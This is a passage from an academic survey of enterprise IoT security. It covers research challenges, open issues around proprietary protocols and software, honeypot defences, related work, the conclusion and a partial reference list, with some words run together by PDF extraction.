E-IoT deployments are diverseand complex. There may be unique threats from deploymentto deployment, especially with the numerous use cases inE-IoT. For instance, a lightning control E-IoT environmentwill be different from a smart media management system interms of vulnerabilities. Specifically, a lighting system mayrely more heavily on serial-based communication interfaces inevery room than media management that relies on touchpanelsand mobile interfaces. Further, even in a lighting system,a purely serial-based system will have different threats andvulnerabilities than a lighting control system with Zigbee/Z-wave interfaces. Many attacks (e.g., node-capture attacks,sensory channel attacks) may have unique system-to-systemconsequences. Namely, if safety or motorization devices relyon E-IoT sensors, an attacker may create a much biggersafety issue if these sensors are compromised. The degree ofcustomization in E-IoT means that one deployment’s solutionsand security guidelines are not applicable for all deployments.
Legacy Systems.
Legacy systems are systems considered to beoutdated, discontinued, and that no longer receive software orsecurity updates. With companies such as Crestron establishedsince the 70’s, it is expected that there are legacy E-IoTsystems installed worldwide [34]. As these systems may notreceive updates for several reasons. For instance, an E-IoTsystem may simply be discontinued or the manufacturer mayno longer exist (e.g., Litetouch lighting control systems) [252].Alternatively, systems have frequent updates and a user maychoose not to update because of cost of the update (e.g.,new devices, software, updated drivers). For example, if an entire building is wired to function with a legacy system,re-wiring and re-programming may be a costly endeavor asopposed to simply keeping an older E-IoT system. In othercases, discontinued devices may not work on newer systems(e.g., driver availability) and a user might choose to keepthe current E-IoT system without updating to keep control ofthese integrated devices. E-IoT needs unique solutions that canprovide protection to legacy E-IoT systems which cannot beupdated.
Reliance on Integrators.
In E-IoT systems, consumers relyupon integrators. This reliance on integrators may create attackscenarios where an E-IoT is compromised because of this trust.For instance, bad account management could allow attackers tocompromise one or multiple systems purely due to integratorsand remote support tooling. Additionally, as integrators handledevices before installation, they can be considered part ofthe supply chain. This adds another stage to the deploymentprocess where devices may be compromised by an attacker ora malicious employee for an installation company. Integratorsmaintain and diagnose E-IoT devices in case of any issues,working directly with the client. As such, there is very littleoversight on how well systems are configured. As poorly-configured devices pose a threat to E-IoT systems, a method forauditing E-IoT system security may be necessary to guaranteesystems are properly configured. Further, more research intoE-IoT security can assist vendors in evaluating existing bestpractices for integrators and developing new best practices.Finally, as E-IoT relies very heavily on integrators, newsolutions are needed to protect end-users against attacks thatmay come from malicious insiders or poor configuration. (Near) Future E-IoT Attacks.
Attackers are in constantsearch of new systems to attack, with nation-state attackershaving the capabilities to perform attacks never thought tobe viable before. Attacks have already been observed thattarget E-IoT devices among other devices with Mirai beingone of the most well-known. In Mirai, research has shown thatCCTV systems, specifically DVRs and NVRs were targetedin the password banks [289]. These devices were possiblyconfigured with default passwords in many cases and reflectsthe need for auditing and better research on E-IoT. If researchis not done, E-IoT systems may end up being used in large-scale attacks, such as DDoS. Attacks would not be limited toDDoS, ransomware attacks may be different in E-IoT, bothrendering a system inoperable and requiring an integrator torepair the affected system. In more advanced attacks, it may bepossible for an attacker to compromise touchscreens, keypads,controllers, and other devices for cryptomining through mali-cious firmware or a malicious controller. Another recent andnotable example of an attack has been coined the “SolarWinds”attack, where thousands of devices were compromised throughvendor tool updates [330], [331]. It may be possible for E-IoTto be affected by similar attacks in the future if precautionsare note taken. This shows that trusted software must also beheld to high scrutiny. Finally, there are the privacy aspectsof E-IoT. The cost of E-IoT systems means that clients maybe wealthy professionals, well-funded companies, or otherwiselucrative targets for attackers, especially in E-IoT smart homes.An attacker may predict the cost of an E-IoT system andFOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagacattack a target that can benefit them more (e.g., businessmen,politicians, wealthy, companies), easily searching by vendoronline and targeting an exposed, poorly configured system.
B. Open Issues
Proprietary Communication.
E-IoT supports a diversity ofprotocols, from publicly-known to proprietary. However, pro-prietary protocols in E-IoT are often closed-source, with nopublic specification. Additionally, E-IoT hardware and soft-ware are often unavailable to the public. Researching E-IoTcommunication can be difficult without vendor cooperationas much of the protocols and practices need to be reverse-engineered. As a result, many E-IoT components and protocolshave not been properly investigated, and many attacks havenot been discovered and addressed. For instance, serial-basedproprietary protocols such as Cresnet are used extensively inCrestron systems; however, little to no security research existson this protocol. This case is also valid for many wirelessprotocols as highlighted in Section V such as RadioRa, Top-Dog RF, and infiNET, where the security methodology used isunknown. It is a realistic assumption that vulnerabilities mustexist with the age and lack of oversight of many of theseproprietary protocols. The absence of known vulnerabilitiesis not due to strong design but through security throughobscurity. Unfortunately, once adversaries find vulnerabilitiesin these protocols, it may lead to easily-compromised systemsas security through obscurity provides very little legitimateprotection. Much more research and collaboration with vendorsare needed for assess the security of these protocols anddevelop security tools (e.g., monitoring, auditing).
Proprietary Software.
In a similar manner to protocols,research on E-IoT software is a challenge as much of E-IoTdevelopment is closed-source with minimal external resourcesavailable. Further, even if research is done on one E-IoTsystem, different systems will follow different integration andconfiguration practices. For instance, components like driversare different in every system, and the implementation mayallow for completely different attacks in each system. Wefound that many E-IoT systems have operated under securitythrough obscurity for their software in addition to communi-cation protocols, a practice that is currently insufficient. Assuch, it may be necessary to find flaws in E-IoT softwarecomponents and correct these flaws before malicious actorscompromise E-IoT installations. It may be a good idea forvendors to cooperate with research and academic communitiesand provide closed-source software to prevent attacks beforethey occur. In comparison to more open industries, in E-IoT, anattacker that acquires source code for E-IoT devices may havea running start in compromising these devices before securityresearchers have even acknowledged the problem. In responseto looming threats, vendors could also offer hackathons, bugbounties, and reward responsible disclosures of vulnerabilitiesthat can affect their systems.
Honeypots as a Defense Strategy.
It may be possible forhoneypots to offer insight and warnings on possible attack-ers against E-IoT systems and complement existing secu-rity mechanisms. Litchfield et al. noted that honeypots can vary between different applications, highlighting that high-interaction honeypots are not suitable in some applications[332]. Other solutions may be possible, for instance, Con-pot, a honeypot system developed by the Honeynet Projectsupporting industrial protocols such as BACnet, EtherNet/IP,and Modbus. These developments are applicable in E-IoTinstallations as honeypot frameworks may be expanded to workwith less-known proprietary E-IoT protocols [333], [334]. Forinstance, Mays et al. proposed a solution to defend homeand building automation systems using decoy networks [159].In this work, researchers created a honeypot network on thesmart automation Insteon protocol to hide communicationusing a dummy network and hide genuine network traffic fromattackers. Such approaches could apply to E-IoT and othercustom systems that rely heavily on physical components, andhopefully to understand the behavior of attackers, thus secureE-IoT systems. IX. R
ELATED W ORK
The security of IoT smart devices have been an ongoingtopic of research in the recent years. As such, a number ofIoT security surveys have been conducted [335]–[346]. Most ofthese surveys cover attacks, defenses, security challenges andgeneral counter-measures in IoT, others are more specific. Forinstance, a survey by Hassan et al., highlights current researchtrends in in IoT security [338]. Other work has focused on IoTsecurity aspects, such as the survey by Deogirikar et al., whichfocused specifically on known IoT attacks [341]. Individually,as early as 2013, works have highlighted threats in smartdevices, and how attackers always search for new, unexploredthreat vectors [5]–[7], [9], [11]–[14]. However, very little on-going research has focused on specific vulnerabilities targetingE-IoT systems or proprietary technologies. Often, vendors willonly guarantee security and perform internal security analysisin their own devices [291].Some topics covered in this survey have had dedicatedsurveys examine attacks, defenses and threats for each topic.For instance, several surveys have covered jamming attacks,and defenses against wireless communication [207]–[210].Surveys on communication are also relevant, with a numberof surveys covering attacks, risks, and defense mechanisms forBluetooth communication [176], [192]–[194]. Sensory chan-nels are also an active subject of research and relevant to E-IoT.As such, related surveys on the security of sensory channelstouch upon subjects beyond E-IoT applications such as WSNsand large-scale sensor deployments [113]–[123]. Further, ascloud computing is an active topic of research, a number ofrelevant surveys have also covered cloud computing threats[309]–[322]. Other works focus on cloud defense mechanisms,applying to different use cases beyond the scope of this surveyand E-IoT applications [311], [315], [317], [319], [321].
Our work differs from previously discussed works as thissurvey focuses on the insecurities, possible threats, and de-fenses applicable to E-IoT. To the best of our knowledge, thisis the first work that focuses solely on E-IoT systems and theirsecurity, categorizing E-IoT systems into four unique layers.Specifically, we categorize E-IoT components into four distinct
FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac layers, (1) the E-IoT Devices layer, (2) the communicationslayer, (3) the Monitoring and Applications layer, and (4)the Business layer. We take this approach as E-IoT systemarchitecture differs from many IoT systems, as highlighted inSection II. Further, we present a threat model for each distinctlayer of E-IoT, as each layer may present different threats andrequire different capabilities from attackers.
X. C
ONCLUSION
The rising popularity of smart systems has led to millionsof users worldwide interacting with smart devices on a day-to-day basis. Many of these devices are commodity, off-the-shelf systems (e.g., Google Home, Samsung SmartThings),easily maintained and installed by the average end-user insmall deployments. However, while easy to install, commoditysystems are limited and do not provide a viable solution formore sophisticated applications. For more extensive installa-tions, E-IoT systems provide a custom-installed solutions tofit a client’s needs. As such, systems such as Crestron, Con-trol4, RTI, and savant offer a solution for more sophisticatedapplications (e.g., complete lighting control, A/V manage-ment, managed CCTV security), where commodity systemsare insufficient. For this reason, E-IoT systems are commonin locations such as high-end smart homes, government andprivate offices, yachts, and conference rooms. In contrast tocommodity systems, E-IoT systems are usually proprietary,costly, closed source, and more robust for their configured usecases. However, even with their popularity, very little researchhas focused on the overall security of E-IoT systems. Namely,no study provides a complete overview of E-IoT systems, theircomponents, threats, and relevant vulnerabilities in the litera-ture. To address this research gap, motivate further research,and raise awareness on E-IoT insecurities, this work focusedsolely on E-IoT systems. Specifically, we discussed E-IoTcomponents, vulnerabilities, and their security implications. Toprovide a better analysis of E-IoT, we divided E-IoT systemsinto four layers: E-IoT Devices Layer, Communications Layer,Monitoring and Applications Layer, and Business Layer. Weconsidered E-IoT components at every layer, the associatedthreat models, attacks, and defense mechanisms. We alsopresented critical observations on E-IoT security and provideda list of open research problems that require further research.We believe this study will raise awareness on E-IoT and E-IoTsecurity, and motivate further research.A
CKNOWLEDGMENTS
This work is partially supported by the US NationalScience Foundation (Awards: NSF-CAREER-CNS-1453647,NSF-1663051, and NSF-1718116). The views are those of theauthors only. R
EFERENCES[1] H. Aksu, L. Babun, M. Conti, G. Tolomei, and A. S. Uluagac. Adver-tising in the IoT Era: Vision and Challenges.
IEEE CommunicationsMagazine , 2018. [2] The number of smart homes in europe and north america reached45 million in 2017. https://iotbusinessnews.com/2018/09/24/20413-the-number-of-smart-homes-in-europe-and-north-america-reached-45-million-in-2017/, Sept, 2018. Online: Accessed 10-December-2019.[3] Mohamed Sultan. Smart to smarter: Smart home systems history,future and challenges. Online: Accessed 10-December-2019.[4] Leonardo Babun, Amit Kumar Sikder, Abbas Acar, and A. Selcuk Ulu-agac. Iotdots: A digital forensics framework for smart environments.
CoRR , 2018.[5] Leonardo Babun, Hidayet Aksu, and A. Selcuk Uluagac. Detection ofcounterfeit and compromised devices using system and function calltracing techniques. (10027697), 7 2018.[6] Babun, Leonardo, Aksu, Hidayet, Uluagac, Selcuk A. Method ofResource-limited Device and Device Class Identification using Systemand Function Call Tracing Techniques, Performance, and StatisticalAnalysis. (10242193), March 2019.[7] Leonardo Babun, Hidayet Aksu, and A. Selcuk Uluagac. A System-Level Behavioral Detection Framework for Compromised CPS De-vices: Smart-Grid Case.
ACM Trans. Cyber-Phys. Syst. , 4(2), nov2019.[8] Kyle Denney, Enes Erdin, Leonardo Babun, and A. Selcuk Uluagac.Dynamically Detecting USB Attacks in Hardware: Poster. In
Proceed-ings of the 12th Conference on Security and Privacy in Wireless andMobile Networks , page 328–329, 2019.[9] Leonardo Babun, Z. Berkay Celik, Patrick McDaniel, and A. SelcukUluagac. Real-time analysis of privacy-(un)aware iot applications.
Proceedings on Privacy Enhancing Technologies , 2021(1):145 – 166,01 Jan. 2021.[10] Kyle Denney, Enes Erdin, Leonardo Babun, Michael Vai, and SelcukUluagac. Usb-watch: A dynamic hardware-assisted usb threat detec-tion framework. In
International Conference on Security and Privacyin Communication Systems , pages 126–146. Springer, 2019.[11] Juan Lopez, Leonardo Babun, Hidayet Aksu, and A Selcuk Uluagac.A survey on function and system call hooking approaches.
Journalof Hardware and Systems Security , 1(2):114–136, 2017. Accessed:11-17-2018.[12] C. Kaygusuz, L. Babun, H. Aksu, and A. S. Uluagac. Detectionof compromised smart grid devices with machine learning and con-volution techniques. In , pages 1–6, May 2018.[13] Amit Kumar Sikder, Leonardo Babun, Hidayet Aksu, and A. SelcukUluagac. Aegis: A context-aware security framework for smart homesystems. In
Proceedings of the 35th Annual Computer SecurityApplications Conference , 2019.[14] Z. Berkay Celik, Leonardo Babun, Amit Kumar Sikder, Hidayet Aksu,Gang Tan, Patrick McDaniel, and A. Selcuk Uluagac. Sensitiveinformation tracking in commodity iot. In , pages 1687–1704, 2018.[15] M. A. N. Abrishamchi, A. H. Abdullah, A. David Cheok, and K. S.Bielawski. Side channel attacks on smart home systems: A shortoverview. In
IECON 2017 = 43rd Annual Conference of the IEEEIndustrial Electronics Society , pages 8144–8149, Oct 2017.[16] Abbas Acar, Hossein Fereidooni, Tigist Abera, Amit Kumar Sikder,Markus Miettinen, Hidayet Aksu, Mauro Conti, Ahmad-Reza Sadeghi,and Selcuk Uluagac. Peek-a-boo: I see your smart home activities,even encrypted! In
Proceedings of the 13th ACM Conference onSecurity and Privacy in Wireless and Mobile Networks , WiSec ’20,page 207–218. ACM, 2020.[17] A. Acar, H. Aksu, A. S. Uluagac, and K. Akkaya. Waca: Wearable-assisted continuous authentication. In , pages 264–269, May 2018.[18] A. K. Sikder, H. Aksu, and A. S. Uluagac. A context-aware frameworkfor detecting sensor-based threats on smart devices.
IEEE Transactionson Mobile Computing , 19(2):245–261, Feb 2020.[19] Amit Kumar Sikder, Giuseppe Petracca, Hidayet Aksu, Trent Jaeger,
FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac and A. Selcuk Uluagac. A survey on sensor-based threats to internet-of-things (iot) devices and applications.
CoRR , abs/1802.02041, 2018.[20] A.S. Uluagac, V. Subramanian, and R. Beyah. Sensory channel threatsto cyber physical systems: A wake-up call. In
IEEE Conference onCommunications and Network Security (CNS), 2014 , pages 301–309.[21] Z. Berkay Celik, Leonardo Babun, Amit Kumar Sikder, Hidayet Aksu,Gang Tan, Patrick McDaniel, and A. Selcuk Uluagac. Sensitiveinformation tracking in commodity iot. In , Baltimore, MD, 2018.[22] AKM Iqtidar Newaz, Amit Kumar Sikder, Mohammad Ashiqur Rah-man, and A Selcuk Uluagac. Healthguard: A machine learning-based security framework for smart healthcare systems. In , 2019.[23] AKM Newaz, Amit Kumar Sikder, Mohammad Ashiqur Rahman,and A Selcuk Uluagac. A survey on security and privacy issuesin modern healthcare systems: Attacks and defenses. arXiv preprintarXiv:2005.07359 , 2020.[24] AKM Iqtidar Newaz, Amit Kumar Sikder, Leonardo Babun, and A Sel-cuk Uluagac. Heka: A novel intrusion detection system for attacks topersonal medical devices. In
IEEE Conference on Communicationsand Network Security (CNS) , 2020.[25] Z. B. Celik, P. McDaniel, G. Tan, L. Babun, and A. S. Uluagac.Verifying Internet of Things Safety and Security in Physical Spaces.
IEEE Security Privacy .[26] Amit Kumar Sikder, Leonardo Babun, Z. Berkay Celik, Abbas Acar,Hidayet Aksu, Patrick McDaniel, Engin Kirda, and A. Selcuk Uluagac.Kratos: Multi-user multi-device-aware access control system for thesmart home. In , 2020.[27] L. Babun, H. Aksu, L. Ryan, K. Akkaya, E. S. Bentley, and A. S.Uluagac. Z-iot: Passive device-class fingerprinting of zigbee andz-wave iot devices. In , pages 1–7, 2020.[28] J. Myers, L. Babun, E. Yao, S. Helble, and P. Allen. Mad-iot: Memoryanomaly detection for the internet of things. In , pages 1–6, 2019.[29] K. Denney, L. Babun, and A. S. Uluagac. USB-Watch: a GeneralizedHardware-Assisted Insider Threat Detection Framework.
Journal ofHardware and Systems Security , 2020.[30] AKM Newaz, Nur Imtiazul Haque, Amit Kumar Sikder, Moham-mad Ashiqur Rahman, and A Selcuk Uluagac. Adversarial attacksto machine learning-based smart healthcare systems. arXiv preprintarXiv:2010.03671 , 2020.[31] AKM Newaz, Amit Kumar Sikder, Mohammad Ashiqur Rahman,and A Selcuk Uluagac. A survey on security and privacy issuesin modern healthcare systems: Attacks and defenses. arXiv preprintarXiv:2005.07359 , 2020.[32] AKM Iqtidar Newaz, Amit Kumar Sikder, Leonardo Babun, andA Selcuk Uluagac. Heka: A novel intrusion detection system forattacks to personal medical devices. In , pages 1–9. IEEE, 2020.[33] AKM Iqtidar Newaz, Amit Kumar Sikder, Mohammad Ashiqur Rah-man, and A Selcuk Uluagac. Healthguard: A machine learning-based security framework for smart healthcare systems. In
Journal of Network andComputer Applications , page 102779, 2020.[53] Muhammad Junaid Farooq and Quanyan Zhu. Iot supply chainsecurity: Overview, challenges, and the road ahead. arXiv preprintarXiv:1908.07828
IEEE Spectrum ,49(6):16–17, 2012.[56] Shivam Bhasin and Francesco Regazzoni. A survey on hardwaretrojan detection techniques. In , pages 2021–2024. IEEE, 2015.[57] Mohammad Tehranipoor and Farinaz Koushanfar. A survey of hard-ware trojan taxonomy and detection.
IEEE design & test of computers ,27(1):10–25, 2010.
FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac [58] Samuel T King, Joseph Tucek, Anthony Cozzie, Chris Grier, WeihangJiang, and Yuanyuan Zhou. Designing and implementing malicioushardware.
Leet , 8:1–8, 2008.[59] Jordan Robertson and Michael Riley. The big hack: How china useda tiny chip to infiltrate us companies.
Bloomberg Businessweek , 4,2018.[60] K. Yang, D. Forte, and M. M. Tehranipoor. Protecting endpoint devicesin iot supply chain. In , pages 351–356, 2015.[61] Kun Yang, Domenic Forte, and Mark Tehranipoor. Resc: An rfid-enabled solution for defending iot supply chain. 23(3), February 2018.[62] Kun Yang, Domenic Forte, and Mark M. Tehranipoor. Cdta: Acomprehensive solution for counterfeit detection, traceability, andauthentication in the iot supply chain. 22(3), April 2017.[63] M. Chamekh, M. Hamdi, S. El Asmi, and T. Kim. Secured distributediot based supply chain architecture. In , pages 199–202, 2018.[64] Crestron. Tsw model touchscreen manual. https://bit.ly/3mcRNrI,2020. Online: Accessed 20-June-2020.[65] Control4. Control4 zigbee: The definitive magic button pressguide. https://technet.genesis-technologies.ch/control4-zigbee-the-definitive-guide/, 2013. Online: Accessed 20-June-2019.[66] M. V. Bharathi, R. C. Tanguturi, C. Jayakumar, and K. Selvamani.Node capture attack in wireless sensor network: A survey. In , pages 1–3, 2012.[67] C. Wang, D. Wang, Y. Tu, G. Xu, and H. Wang. Understandingnode capture attacks in user authentication schemes for wireless sensornetworks.
IEEE Transactions on Dependable and Secure Computing ,pages 1–1, 2020.[68] Tamara Bonaci, Linda Bushnell, and Radha Poovendran. Probabilisticanalysis of covering and compromise in a node capture attack.
NetworkSecurity Lab (NSL), Seattle, WA, Techical Report , 1, 2010.[69] T. Bonaci, L. Bushnell, and R. Poovendran. Node capture attacks inwireless sensor networks: A system theoretic approach. In , pages 6765–6772, 2010.[70] Pradip De, Yonghe Liu, and Sajal K Das. Deployment-aware model-ing of node compromise spread in wireless sensor networks usingepidemic theory.
ACM Transactions on Sensor Networks (TOSN) ,5(3):1–33, 2009.[71] D. S. Kim, Y. K. Suh, and J. S. Park. Toward assessing vulnerabilityand risk of sensor networks under node compromise. In , pages 740–744, 2007.[72] A. K. Mishra and A. K. Turuk. Adversary information gathering modelfor node capture attack in wireless sensor networks. In , pages1–5, 2011.[73] A. Ramos, B. Aquino, M. Lazar, R. H. Filho, and J. J. P. C. Rodrigues.A quantitative model for dynamic security analysis of wireless sensornetworks. In
GLOBECOM 2017 - 2017 IEEE Global CommunicationsConference , pages 1–6, 2017.[74] Ingram Micro. 4 innovations in theft and loss preven-tion. https://imaginenext.ingrammicro.com/iot/4-innovations-in-theft-and-loss-prevention, 2019. Online: Accessed 22-September-2020.[75] François-Xavier Standaert. Introduction to side-channel attacks. In
Secure integrated circuits and systems , pages 27–42. Springer, 2010.[76] Peter Smulders. The threat of information theft by reception ofelectromagnetic radiation from rs-232 cables.
Computers & Security ,9(1):53 – 58, 1990.[77] Shian-Uei Hwu and Donald R Wilton. Electromagnetic scattering andradiation by arbitrary configurations of conducting bodies and wires.Technical report, San Diego State Univ Foundation CA, 1988. [78] Wim Van Eck. Electromagnetic radiation from video display units:An eavesdropping risk?
Computers & Security , 4(4):269–286, 1985.[79] Markus G Kuhn. Electromagnetic eavesdropping risks of flat-paneldisplays. In
International Workshop on Privacy Enhancing Technolo-gies
Commun. ACM , 58(2):15–17, January2015.[82] Yi Xu, Jan-Michael Frahm, and Fabian Monrose. Watching the watch-ers: Automatically inferring tv content from outdoor light effusions.In
Proceedings of the 2014 ACM SIGSAC Conference on Computerand Communications Security , pages 418–428, 2014.[83] Mingshen Sun, Min Zheng, John CS Lui, and Xuxian Jiang. Designand implementation of an android host-based intrusion prevention sys-tem. In
Proceedings of the 30th annual computer security applicationsconference , pages 226–235, 2014.[84] Xiaolei Wang, Yuexiang Yang, Yingzhi Zeng, Chuan Tang, JiangyongShi, and Kele Xu. A novel hybrid mobile malware detection systemintegrating anomaly detection with misuse detection. In
Proceedingsof the 6th International Workshop on Mobile Cloud Computing andServices , pages 15–22, 2015.[85] William Enck, Peter Gilbert, Seungyeop Han, Vasant Tendulkar,Byung-Gon Chun, Landon P Cox, Jaeyeon Jung, Patrick McDaniel,and Anmol N Sheth. Taintdroid: an information-flow tracking systemfor realtime privacy monitoring on smartphones.
ACM Transactionson Computer Systems (TOCS) , 32(2):1–29, 2014.[86] Wen-Chieh Wu and Shih-Hao Hung. Droiddolphin: a dynamic androidmalware detection framework using big data and machine learning. In
Proceedings of the 2014 Conference on Research in Adaptive andConvergent Systems , pages 247–252, 2014.[87] Zhi Xu and Sencun Zhu. Semadroid: A privacy-aware sensor man-agement framework for smartphones. In
Proceedings of the 5th ACMConference on Data and Application Security and Privacy , pages 61–72, 2015.[88] Lorenz Schwittmann, Christopher Boelmann, Viktor Matkovic,Matthäus Wander, and Torben Weis. Identifying tv channels & on-demand videos using ambient light sensors.
Pervasive and MobileComputing , 38:363–380, 2017.[89] Lorenz Schwittmann, Viktor Matkovic, Torben Weis, et al. Videorecognition using ambient light sensors. In ,pages 1–9. IEEE, 2016.[90] Anindya Maiti and Murtuza Jadliwala. Light ears: Information leakagevia smart lights.
Proceedings of the ACM on Interactive, Mobile,Wearable and Ubiquitous Technologies , 3(3):1–27, 2019.[91] Zheng Zhou, Weiming Zhang, and Nenghai Yu. Irexf: Data exfiltrationfrom air-gapped networks by infrared remote control signals. arXivpreprint arXiv:1801.03218 , 2018.[92] Mordechai Guri, Ofer Hasson, Gabi Kedma, and Yuval Elovici. Anoptical covert-channel to leak data through an air-gap. In , pages 642–649. IEEE, 2016.[93] Mordechai Guri and Dima Bykhovsky. air-jumper: Covert air-gapexfiltration/infiltration via security cameras & infrared (ir).
Computers& Security , 82:15–29, 2019.[94] Yuval Elovici Mordechai Guri. Bridgeware: The air-gap malware.2018.[95] Joe Loughry and David A Umphress. Information leakage from opticalemanations.
ACM Transactions on Information and System Security(TISSEC) , 5(3):262–289, 2002.[96] Eyal Ronen and Adi Shamir. Extended functionality attacks on iot
FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac devices: The case of smart lights. In , pages 3–12. IEEE, 2016.[97] Amit Kumar Sikder, Hidayet Aksu, and A Selcuk Uluagac. Context-aware intrusion detection method for smart devices with sensors,September 17 2019. US Patent 10,417,413.[98] Amit Kumar Sikder, Hidayet Aksu, and A Selcuk Uluagac. 6thsense:A context-aware sensor-based attack detector for smart devices. In { USENIX } Security Symposium ( { USENIX } Security 17) , pages397–414, 2017.[99] V. Shakhov, I. Koo, and A. Rodionov. Energy exhaustion attacksin wireless networks. In , pages1–3, 2017.[100] Michael Bauer, Mark Coatsworth, and Justin Moeller. Nansa: A no-attribution nosleep battery exhaustion attack for portable computingdevices. http://pages.cs.wisc.edu/ bauer/CS736Final.pdf, 2015. Online:Accessed 11-Feb-2021.[101] B. R. Moyers, J. P. Dunning, R. C. Marchany, and J. G. Tront. Effectsof wi-fi and bluetooth battery exhaustion attacks on mobile devices.In ,pages 1–9, 2010.[102] T. Martin, M. Hsiao, Dong Ha, and J. Krishnaswami. Denial-of-service attacks on battery-powered mobile computers. In
Second IEEEAnnual Conference on Pervasive Computing and Communications,2004. Proceedings of the , pages 309–318, 2004.[103] Timothy K Buennemeyer, Michael Gora, Randy C Marchany, andJoseph G Tront. Battery exhaustion attack detection with smallhandheld mobile computers. In , pages 1–5. IEEE, 2007.[104] Daniel Charles Nash.
An Intrusion Detection System for BatteryExhaustion Attacks on Mobile Computers . PhD thesis, Virginia Tech,2005.[105] R. Upadhyay, S. Khan, H. Tripathi, and U. R. Bhatt. Detectionand prevention of ddos attack in wsn for aodv and dsr using batterydrain. In , pages 446–451, 2015.[106] Stefan Hristozov, Manuel Huber, and Georg Sigl. Protecting restfuliot devices from battery exhaustion dos attacks. arXiv preprintarXiv:1911.08134
The Journal of Supercomputing , 71(8):3181–3212, 2015.[112] Abe Davis, Michael Rubinstein, Neal Wadhwa, Gautham J. Mysore,Frédo Durand, and William T. Freeman. The visual microphone:Passive recovery of sound from video.
ACM Trans. Graph. , 33(4),July 2014.[113] Kai Xing, Shyaam Sundhar Rajamadam Srinivasan, Major Jose, JiangLi, Xiuzhen Cheng, et al. Attacks and countermeasures in sensornetworks: a survey. In
Network security , pages 251–272. Springer,2010.[114] P. Sinha, V. K. Jha, A. K. Rai, and B. Bhushan. Security vulnerabilities,attacks and countermeasures in wireless sensor networks at variouslayers of osi reference model: A survey. In , pages288–293, 2017. [115] Furrakh Shahzad, Maruf Pasha, and Arslan Ahmad. A survey of activeattacks on wireless sensor networks and their countermeasures. arXivpreprint arXiv:1702.07136 , 2017.[116] Dr G Padmavathi, Mrs Shanmugapriya, et al. A survey of attacks,security mechanisms and challenges in wireless sensor networks. arXivpreprint arXiv:0909.0576 , 2009.[117] David Martins and Hervé Guyennet. Wireless sensor network attacksand security mechanisms: A short survey. In , pages 313–320.IEEE, 2010.[118] Shio Kumar Singh, MP Singh, and Dharmendra K Singh. A surveyon network security and attack defense mechanism for wireless sensornetworks.
International Journal of Computer Trends and Technology ,1(2):9–17, 2011.[119] Leela Krishna Bysani and Ashok Kumar Turuk. A survey on selectiveforwarding attack in wireless sensor networks. In , pages 1–5.IEEE, 2011.[120] Majid Meghdadi, Suat Ozdemir, and Inan Güler. A survey ofwormhole-based attacks and their countermeasures in wireless sensornetworks.
IETE technical review , 28(2):89–102, 2011.[121] K Venkatraman, J Vijay Daniel, and G Murugaboopathi. Variousattacks in wireless sensor network: Survey.
International Journal ofSoft Computing and Engineering (IJSCE) , 3(1):208–212, 2013.[122] Anthony D Wood and John A Stankovic. A taxonomy for denial-of-service attacks in wireless sensor networks.
Handbook of sensornetworks: compact wireless and wired sensing systems , pages 739–763, 2004.[123] David R Raymond and Scott F Midkiff. Denial-of-service in wirelesssensor networks: Attacks and defenses.
IEEE Pervasive Computing ,7(1):74–81, 2008.[124] Wenyuan Xu Kevin Fu. Risks of trusting the physics of sen-sors. hhttps://cacm.acm.org/opinion/articles/224627-risks-of-trusting-the-physics-of-sensors/fulltext, 2018. Online: Accessed 20-June-2019.[125] Guoming Zhang, Chen Yan, Xiaoyu Ji, Tianchen Zhang, TaiminZhang, and Wenyuan Xu. Dolphinattack: Inaudible voice commands.In
Proceedings of the 2017 ACM SIGSAC Conference on Computerand Communications Security , pages 103–117, 2017.[126] A Selcuk Uluagac, Venkatachalam Subramanian, and Raheem Beyah.Sensory channel threats to cyber physical systems: A wake-up call.In ,pages 301–309. IEEE, 2014.[127] Raphael Spreitzer. Pin skimming: Exploiting the ambient-light sensorin mobile devices. In
Proceedings of the 4th ACM Workshop onSecurity and Privacy in Smartphones & Mobile Devices , pages 51–62,2014.[128] Liang Cai and Hao Chen. On the practicality of motion basedkeystroke inference attack. In
International Conference on Trust andTrustworthy Computing , pages 273–290. Springer, 2012.[129] Ahmed Al-Haiqi, Mahamod Ismail, and Rosdiadee Nordin. Keystrokesinference attack on android: A comparative evaluation of sensors andtheir fusion.
Journal of ICT Research and Applications , 7(2):117–136,2013.[130] Yan Huang, Xin Guan, Hongyang Chen, Yi Liang, Shanshan Yuan, andTomoaki Ohtsuki. Risk assessment of private information inference formotion sensor embedded iot devices.
IEEE Transactions on EmergingTopics in Computational Intelligence , 2019.[131] Emmanuel Owusu, Jun Han, Sauvik Das, Adrian Perrig, and JoyZhang. Accessory: password inference using accelerometers onsmartphones. In
Proceedings of the Twelfth Workshop on MobileComputing Systems & Applications , pages 1–6, 2012.[132] Philip Marquardt, Arunabh Verma, Henry Carter, and Patrick Traynor.(sp) iphone: Decoding vibrations from nearby keyboards using mobilephone accelerometers. In
Proceedings of the 18th ACM conference onComputer and communications security , pages 551–562, 2011.
FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac [133] Sashank Narain, Amirali Sanatinia, and Guevara Noubir. Single-strokelanguage-agnostic keylogging using stereo-microphones and domainspecific machine learning. In
Proceedings of the 2014 ACM conferenceon Security and privacy in wireless & mobile networks , pages 201–212, 2014.[134] Jessy Lin and Jason Seibel. Motion-based side-channel attackon mobile keystrokes. http://css.csail.mit.edu/6.858/2019/projects/lnj-jseibel.pdf, 2019.[135] Zhi Xu, Kun Bai, and Sencun Zhu. Taplogger: Inferring user inputson smartphone touchscreens using on-board motion sensors. In
Proceedings of the fifth ACM conference on Security and Privacy inWireless and Mobile Networks , pages 113–124, 2012.[136] Emiliano Miluzzo, Alexander Varshavsky, Suhrid Balakrishnan, andRomit Roy Choudhury. Tapprints: your finger taps have fingerprints.In
